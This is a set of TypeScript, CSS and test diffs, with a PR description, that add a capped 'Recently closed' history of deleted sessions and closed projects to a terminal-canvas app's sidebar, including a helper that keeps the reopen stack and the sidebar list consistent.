     if (activeProjectId === id) {
       // Move focus to the nearest still-open project (search outward), or the welcome screen.
@@ -587,6 +597,41 @@ export const useProjects = create<ProjectsState>((set, get) => ({
     }
     set({ projects: next, activeProjectId: nextActive })
     return nextActive
+  },
+
+  recordClosedSessions(projectId, entries) {
+    if (!entries.length) return
+    set((s) => ({
+      projects: s.projects.map((p) =>
+        p.id !== projectId
+          ? p
+          : { ...p, closedSessions: [...entries, ...(p.closedSessions ?? [])].slice(0, 20) }
+      )
+    }))
+  },
+
+  consumeClosedSession(projectId, entryId) {
+    let found: ClosedSessionEntry | undefined
+    set((s) => ({
+      projects: s.projects.map((p) => {
+        if (p.id !== projectId || !p.closedSessions) return p
+        const idx = p.closedSessions.findIndex((e) => e.id === entryId)
+        if (idx === -1) return p
+        found = p.closedSessions[idx]
+        return { ...p, closedSessions: p.closedSessions.filter((e) => e.id !== entryId) }
+      })
+    }))
+    return found
+  },
+
+  discardClosedSession(projectId, entryId) {
+    set((s) => ({
+      projects: s.projects.map((p) =>
+        p.id !== projectId || !p.closedSessions
+          ? p
+          : { ...p, closedSessions: p.closedSessions.filter((e) => e.id !== entryId) }
+      )
+    }))
   },
 
   reopenProject(id) {

--- a/src/renderer/state/reopenHistory.test.ts
+++ b/src/renderer/state/reopenHistory.test.ts
@@ -1,7 +1,19 @@
 import { describe, it, expect } from 'vitest'
-import { pushEntry, popEntry, HISTORY_CAP, type ReopenEntry } from './reopenHistory'
+import { pushEntry, popEntry, dropClosedSessionRef, HISTORY_CAP, type ReopenEntry } from './reopenHistory'
+import type { ReopenNodeSnapshot } from '@renderer/lib/reopenNode'
 
 const proj = (id: string, closedAt: number): ReopenEntry => ({ kind: 'project', projectId: id, closedAt })
+
+const snap = (over: Partial<ReopenNodeSnapshot> = {}): ReopenNodeSnapshot =>
+  ({
+    type: 'terminal', position: { x: 0, y: 0 }, absolutePosition: { x: 0, y: 0 },
+    data: { title: 't', color: '#fff', group: null },
+    ...over
+  }) as ReopenNodeSnapshot
+
+const nodesEntry = (projectId: string, snapshots: ReopenNodeSnapshot[]): ReopenEntry => ({
+  kind: 'nodes', projectId, closedAt: 1, nodes: snapshots
+})
 
 describe('pushEntry', () => {
   it('appends to the end (most recent last)', () => {
@@ -32,5 +44,34 @@ describe('popEntry', () => {
     const { entry, rest } = popEntry([])
     expect(entry).toBeUndefined()
     expect(rest).toEqual([])
+  })
+})
+
+describe('dropClosedSessionRef', () => {
+  it('drops the one matching snapshot, keeping the rest of the batch', () => {
+    const stack = [
+      nodesEntry('p1', [
+        snap({ closedSessionId: 'e1' }),
+        snap({ closedSessionId: 'e2' })
+      ])
+    ]
+    const out = dropClosedSessionRef(stack, 'p1', 'e1')
+    expect(out).toHaveLength(1)
+    expect((out[0] as { nodes: ReopenNodeSnapshot[] }).nodes.map((n) => n.closedSessionId)).toEqual(['e2'])
+  })
+
+  it('drops the whole entry once its last matching snapshot is removed — an empty batch is a dead stack slot', () => {
+    const stack = [nodesEntry('p1', [snap({ closedSessionId: 'e1' })])]
+    expect(dropClosedSessionRef(stack, 'p1', 'e1')).toEqual([])
+  })
+
+  it('only matches the same projectId — a foreign project with the same entry id is untouched', () => {
+    const stack = [nodesEntry('other', [snap({ closedSessionId: 'e1' })])]
+    expect(dropClosedSessionRef(stack, 'p1', 'e1')).toEqual(stack)
+  })
+
+  it('leaves kind:"project" entries and snapshots with no closedSessionId untouched', () => {
+    const stack = [proj('p1', 1), nodesEntry('p1', [snap()])]
+    expect(dropClosedSessionRef(stack, 'p1', 'e1')).toEqual(stack)
   })
 })

--- a/src/renderer/state/reopenHistory.ts
+++ b/src/renderer/state/reopenHistory.ts
@@ -22,12 +22,39 @@ export function popEntry(stack: ReopenEntry[]): { entry: ReopenEntry | undefined
   return { entry: stack[stack.length - 1], rest: stack.slice(0, -1) }
 }
 
+/**
+ * Drops every snapshot tagged with `entryId` (`ReopenNodeSnapshot.closedSessionId`) out of
+ * `projectId`'s `kind: 'nodes'` entries, then drops any entry left with no nodes at all — an
+ * empty batch would restore nothing if popped, so it must not linger as a dead stack slot.
+ * `kind: 'project'` entries carry no snapshots and pass through untouched.
+ *
+ * This is the ⇧⌘T-stack twin of `useProjects.discardClosedSession`: the sidebar's persisted
+ * "Recently closed" list and this in-memory stack both get a row for the SAME delete, and
+ * reopening one must consume the other's matching entry too — otherwise a single delete can be
+ * reopened twice, minting two duplicate nodes from one closed session.
+ */
+export function dropClosedSessionRef(
+  stack: ReopenEntry[],
+  projectId: string,
+  entryId: string
+): ReopenEntry[] {
+  return stack
+    .map((e) =>
+      e.kind === 'nodes' && e.projectId === projectId
+        ? { ...e, nodes: e.nodes.filter((n) => n.closedSessionId !== entryId) }
+        : e
+    )
+    .filter((e) => e.kind !== 'nodes' || e.nodes.length > 0)
+}
+
 interface ReopenHistoryState {
   stack: ReopenEntry[]
   push: (entry: ReopenEntry) => void
   /** Pops and returns the most recent entry. Callers that find it stale (project already
    *  reopened another way, or permanently deleted) call this again to keep walking back. */
   popNext: () => ReopenEntry | undefined
+  /** See `dropClosedSessionRef`. */
+  dropByClosedSessionId: (projectId: string, entryId: string) => void
 }
 
 export const useReopenHistory = create<ReopenHistoryState>((set, get) => ({
@@ -37,5 +64,7 @@ export const useReopenHistory = create<ReopenHistoryState>((set, get) => ({
     const { entry, rest } = popEntry(get().stack)
     if (entry) set({ stack: rest })
     return entry
-  }
+  },
+  dropByClosedSessionId: (projectId, entryId) =>
+    set((s) => ({ stack: dropClosedSessionRef(s.stack, projectId, entryId) }))
 }))

--- a/src/renderer/styles.css
+++ b/src/renderer/styles.css
@@ -7109,6 +7109,53 @@ button.group-node__setup:disabled {
 .sessions-sidebar__body { overflow-y: auto; padding: 4px 6px 8px; }
 .sessions-sidebar__empty { padding: 18px 12px; text-align: center; font-size: 12px; color: var(--muted); }
 
+/* "Recently closed" — merged closed-projects/closed-sessions history at the bottom of the
+   sidebar. Same head layout as .sessions-sidebar__head, just smaller/muted (it is a secondary
+   section, not the panel's own header). */
+.sessions-sidebar__history { border-top: 1px solid var(--border); }
+.sessions-sidebar__history-head {
+  display: flex;
+  align-items: center;
+  gap: 6px;
+  padding: 8px 10px;
+  cursor: pointer;
+  border-radius: 6px;
+}
+.sessions-sidebar__history-head:hover { background: var(--panel-header); }
+.sessions-sidebar__history-title { font-size: 11px; font-weight: 600; color: var(--muted); }
+.sessions-sidebar__history-list { display: flex; flex-direction: column; padding: 0 6px 6px; }
+.sessions-sidebar__history-item {
+  display: flex;
+  align-items: center;
+  gap: 8px;
+  padding: 5px 6px;
+  border-radius: 6px;
+  color: var(--text);
+  cursor: pointer;
+}
+.sessions-sidebar__history-item:hover { background: var(--panel-header); }
+.sessions-sidebar__history-name { font-size: 12px; overflow: hidden; text-overflow: ellipsis; white-space: nowrap; min-width: 0; }
+.sessions-sidebar__history-age { margin-left: auto; flex: none; font-size: 10.5px; color: var(--muted); }
+.sessions-sidebar__history-del {
+  flex: none;
+  width: 18px;
+  height: 18px;
+  display: flex;
+  align-items: center;
+  justify-content: center;
+  background: transparent;
+  border: none;
+  border-radius: 5px;
+  color: var(--muted);
+  font-size: 14px;
+  line-height: 1;
+  cursor: pointer;
+  opacity: 0;
+  transition: opacity 0.12s, background 0.12s, color 0.12s;
+}
+.sessions-sidebar__history-item:hover .sessions-sidebar__history-del { opacity: 1; }
+.sessions-sidebar__history-del:hover { background: rgba(255, 69, 58, 0.15); color: var(--danger); }
+
 .ss-group__head { display: flex; align-items: center; gap: 6px; padding: 6px 6px; cursor: pointer; border-radius: 6px; border: 1px solid transparent; }
 .ss-group__head:hover { background: var(--panel-header); }
 /* Project sections read as bands: monogram + heavier head + breathing room between projects. */

--- a/src/renderer/styles.css
+++ b/src/renderer/styles.css
@@ -7112,7 +7112,7 @@ button.group-node__setup:disabled {
 /* "Recently closed" — merged closed-projects/closed-sessions history at the bottom of the
    sidebar. Same head layout as .sessions-sidebar__head, just smaller/muted (it is a secondary
    section, not the panel's own header). */
-.sessions-sidebar__history { border-top: 1px solid var(--border); }
+.sessions-sidebar__history { border-top: 1px solid var(--border); flex: 0 0 auto; }
 .sessions-sidebar__history-head {
   display: flex;
   align-items: center;
@@ -7123,7 +7123,33 @@ button.group-node__setup:disabled {
 }
 .sessions-sidebar__history-head:hover { background: var(--panel-header); }
 .sessions-sidebar__history-title { font-size: 11px; font-weight: 600; color: var(--muted); }
-.sessions-sidebar__history-list { display: flex; flex-direction: column; padding: 0 6px 6px; }
+/* Same 18px muted box as the project/group disclosure toggle (.ss-group__chev) — the section head
+   sits beside an 11px muted title, and an unstyled glyph inherits body size and --text, reading
+   louder than the label it belongs to. */
+.sessions-sidebar__chevron {
+  display: inline-flex;
+  align-items: center;
+  justify-content: center;
+  flex: 0 0 auto;
+  width: 18px;
+  height: 18px;
+  margin: -3px -2px -3px -3px;
+  font-size: 9px;
+  line-height: 1;
+  color: var(--muted);
+}
+/* This section is a sibling of .sessions-sidebar__body inside a max-height flex column, so it must
+   scroll on its OWN — .sessions-sidebar__body earns an automatic min-size of 0 from its
+   `overflow-y: auto` and therefore shrinks, while a list with visible overflow would keep its full
+   content height and squeeze the session list toward zero. The cap is 20 entries PER PROJECT, so
+   the row count is unbounded across projects. */
+.sessions-sidebar__history-list {
+  display: flex;
+  flex-direction: column;
+  padding: 0 6px 6px;
+  max-height: 30vh;
+  overflow-y: auto;
+}
 .sessions-sidebar__history-item {
   display: flex;
   align-items: center;

--- a/src/shared/types.ts
+++ b/src/shared/types.ts
@@ -411,6 +411,20 @@ export interface CanvasNodeState {
 }
 
 /**
+ * One entry in `Project.closedSessions` — everything needed to recreate a fresh node in the same
+ * spot a deleted one used to occupy. `node` is the exact shape a live node is already persisted
+ * as (`CanvasNodeState`); `absolutePosition` is captured at delete time because `node.position`
+ * is relative-to-parent when `node.parentId` is set, and that parent group may not exist by the
+ * time this entry is reopened.
+ */
+export interface ClosedSessionEntry {
+  id: string
+  closedAt: number
+  node: CanvasNodeState
+  absolutePosition: { x: number; y: number }
+}
+
+/**
  * A snapshot of one canvas's nodes in the form sent over the remote mirror wire.
  * Reuses the persisted node shape (`CanvasNodeState`) so host and client agree on layout.
  */
@@ -695,6 +709,13 @@ export interface Project {
    * list. Absent/false = an open tab. A closed project never becomes `activeProjectId`.
    */
   closed?: boolean
+  /**
+   * Sessions (terminal/agent/sticky/…) deleted from this project, most-recent-first, capped at
+   * 20. Git-shared like `nodes`/`kanban` — reopening a teammate's deleted session is intentional.
+   * A fresh id per entry; recreating a node from one always mints a new node id/session, never
+   * reuses the original (see `recreateNodeFromSnapshot`).
+   */
+  closedSessions?: ClosedSessionEntry[]
   /**
    * Set at load time when the project's .nodeterm/project.json could not be read
    * (folder missing, server unreachable, corrupt file). Runtime-only — never persisted.

--- a/src/shared/types.ts
+++ b/src/shared/types.ts
@@ -428,10 +428,11 @@ export interface ClosedSessionEntry {
  * How many closed-session entries one project keeps (newest-first; the rest are dropped).
  *
  * ONE definition, because the cap must hold at every point an entry list is produced OR admitted:
- * the store mutator that records a delete (`recordClosedSessions`), and BOTH sides of the shared
- * file (`projectToFile`/`fileToProject`). Enforcing it only where WE append is not enforcement at
- * all — `closedSessions` is git-shared, so an inflated list arrives from outside (a teammate's
- * file, a hand edit) and would render unbounded rows and be written back in full.
+ * the store mutator that records a delete (`recordClosedSessions`), and every load path that
+ * admits `IndexEntryV3.closedSessions` (a ref'd project's machine-local history) or an inline
+ * project's embedded one. Enforcing it only where WE append is not enforcement at all —
+ * workspace.json is hand-editable input too, so an inflated list can arrive from outside (a
+ * pre-cap build's file, a hand edit) and would render unbounded rows and be written back in full.
  */
 export const CLOSED_SESSIONS_CAP = 20
 
@@ -727,9 +728,12 @@ export interface Project {
   closedAt?: number
   /**
    * Sessions (terminal/agent/sticky/…) deleted from this project, most-recent-first, capped at
-   * 20. Git-shared like `nodes`/`kanban` — reopening a teammate's deleted session is intentional.
-   * A fresh id per entry; recreating a node from one always mints a new node id/session, never
-   * reuses the original (see `recreateNodeFromSnapshot`).
+   * 20. MACHINE-LOCAL, same rule as `closedAt`/`breadcrumbs` — see `IndexEntryV3.closedSessions`,
+   * never written into the shared project file (a delete's full node-state blob — title, cwd,
+   * position — would otherwise churn a committed, teammate-visible document on every one). Whose
+   * trash can holds what is a per-machine fact, not shared content. A fresh id per entry;
+   * recreating a node from one always mints a new node id/session, never reuses the original
+   * (see `recreateNodeFromSnapshot`).
    */
   closedSessions?: ClosedSessionEntry[]
   /**

--- a/src/shared/types.ts
+++ b/src/shared/types.ts
@@ -425,6 +425,17 @@ export interface ClosedSessionEntry {
 }
 
 /**
+ * How many closed-session entries one project keeps (newest-first; the rest are dropped).
+ *
+ * ONE definition, because the cap must hold at every point an entry list is produced OR admitted:
+ * the store mutator that records a delete (`recordClosedSessions`), and BOTH sides of the shared
+ * file (`projectToFile`/`fileToProject`). Enforcing it only where WE append is not enforcement at
+ * all — `closedSessions` is git-shared, so an inflated list arrives from outside (a teammate's
+ * file, a hand edit) and would render unbounded rows and be written back in full.
+ */
+export const CLOSED_SESSIONS_CAP = 20
+
+/**
  * A snapshot of one canvas's nodes in the form sent over the remote mirror wire.
  * Reuses the persisted node shape (`CanvasNodeState`) so host and client agree on layout.
  */

--- a/src/shared/types.ts
+++ b/src/shared/types.ts
@@ -709,6 +709,11 @@ export interface Project {
    * list. Absent/false = an open tab. A closed project never becomes `activeProjectId`.
    */
   closed?: boolean
+  /** Set alongside `closed: true` — when this project was closed, for sorting "recently closed"
+   *  history newest-first. Machine-local (see `IndexEntryV3.closedAt`) — never written into the
+   *  shared project file, same rule as `closed` itself. Absent on a project closed before this
+   *  field existed; such entries sort last. */
+  closedAt?: number
   /**
    * Sessions (terminal/agent/sticky/…) deleted from this project, most-recent-first, capped at
    * 20. Git-shared like `nodes`/`kanban` — reopening a teammate's deleted session is intentional.


### PR DESCRIPTION
## Summary

Adds a persisted, browsable "Recently closed" history to the sessions sidebar:

- Deleting a terminal/agent/sticky/etc. node now logs a git-shared entry (capped at 20 per project, newest-first) into `.nodeterm/project.json` instead of vanishing.
- A new "Recently closed" section in the sessions sidebar merges these closed-session entries with existing closed-project entries, sorted by recency.
- Reopening a session recreates a fresh node/tmux session via the existing `recreateNodeFromSnapshot` machinery (never the original killed session's content); reopening a project reuses the existing `reopenProject`.
- Shares its core snapshot/recreate/plan-execution machinery with the existing in-memory `Cmd+Shift+T` "reopen last closed" feature rather than duplicating it.
- Closed-session entries are sanitized through the same exec-stripping/portability/partition/trigger pipeline live nodes already go through, in both directions — a git-shared `project.json` can never smuggle an executable command via a deleted-session entry.

## Test plan

- [x] `npm run typecheck` clean
- [x] `npm run build` succeeds
- [x] `npm test` — same pre-existing, unrelated failure count as the pre-work baseline (generated-shell/real-tmux/real-pty/e2e suites); zero new failures; all new tests pass
- [ ] Manual smoke test in a running Electron app (not performed — no GUI available in this environment): delete a node, confirm it appears in "Recently closed" and reopens correctly with the same cwd; close a project, confirm it appears in the same section; verify both survive an app restart; verify the sidebar's flex sizing holds up with 25+ history rows across two projects